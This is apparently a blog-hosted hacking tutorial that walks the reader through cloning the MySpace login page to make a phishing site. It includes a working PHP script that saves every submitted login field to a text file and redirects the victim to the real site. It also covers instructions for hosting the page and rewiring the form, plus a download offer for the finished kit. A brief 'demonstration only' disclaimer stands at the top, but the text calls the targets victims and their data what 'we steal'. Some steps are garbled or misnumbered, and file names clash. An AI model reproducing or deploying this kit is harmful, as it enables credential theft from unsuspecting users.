Make a Phishing site.
Note- this tutorial is just for demonstration Purpose and to make you conscious that how much we have to take care while entering passwords. please do not use it for personal benefits. we do not promote hacking. If you know html or php, you will find it very easy. lets See how simple it is to construct and set up a fake login page and steal the password.
Hello! I've seen a lot of requests on different phishing sites, so I decided to make a guide how to create one yourself! Practice makes master!
In the guide, I will make a phishing login page for Myspace. (They got an easy HTML source when it comes to searching. Great to start with..)
Lets get going!
1) Enter MySpace, right click on the page and select 'View Source'
2) Now, to make a phishing site we need somewhere to host it! The host needs to have PHP Server scripting enabled.
0009.WS Web Hosting and Online File Storage - upload pictures, videos, MP3 and music files and share your files with the world is a very easy one, register an account there and get moving..
3) Right-Click on the source text and select 'Mark all' then 'Copy' and paste it in Notepad, name it index.php
4) Now we need the create the PHP script, which will enter the information the victim enters into the log in field on the page and redirects them to the real Myspace page.
Please learn the basics of PHP at W3Schools Online Web Tutorials
It is really easy, takes around 15 minutes, then you know it for life.
5) Now, for Myspace we will use this redirecting script:
Here isJust copy the below php code in red and paste it in a notepad. after this save it as .php file on the desktop.
for eg:- code.php<?php?> a link to the done redirecting script for myspace.
header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
6) Paste your created redirecting script in Notepad and save it as "CODE.php"
7) Now we will create the log the information we steal will be saved to. Create a new Notepad file and save it "log" (log.txt, but the extension will be added automatically in Windows.Now, open your index.php again, and lets start search.
9) We will first search for the word "action="
(We're looking for where the user will enter his email and password.)
10) According to the URL this is some sort of search future on Myspace for some Profile, not what we're looking for.
Code:N><A class=languageLink href="http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=1dd14fb6-0f2a-4ab4-a231-b9
11) Hit Search again. As you can see, we're only getting results for MySpace, etc.
12) Lets go back on the Myspace site and check what we need. (MySpace)
13) "Email" is located near the login box!!14) Great! Lets just go back to the index file and search for "Email". Keep searching a few times!
15) Found it!
16) Now! Look at this line!Delete this:Code:<form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
Code:http://secure.myspace.com/index.cfm?fuseaction=login.process
And replace it with "CODE.php" (which was your redirecting script.
The line will look like this after you are done:
17) Save the file by going File -> Save, or simply press CTRL-S (Save hotkey in Windows.)Code:<form action="redirect.php" method="post" id="LoginForm" name="aspnetForm">
1
19) Upload your files;
- Log.txt
- index.php
- code.php
20) Open your index.php online and check if everything correct!
Uploaded files if you lost them and don't want to do it again then you can download the pack with:
- Complete index.php
- redirect.php
- log.txt
Mirrors:#1:DOWNLOAD NOW!
#2: Coming if needed.
EDIT: I cannot post the redirecting script at the forum, the \ \ inside the code disappears automaticARJUN ally. http://hack1nt0sh.blogspot.com/I will upload it as a file instead.
You have now learned how to setup a phishing site!
Good job! Any questions please reply in the post, no PM spam.
Regards,
No comments:
Post a Comment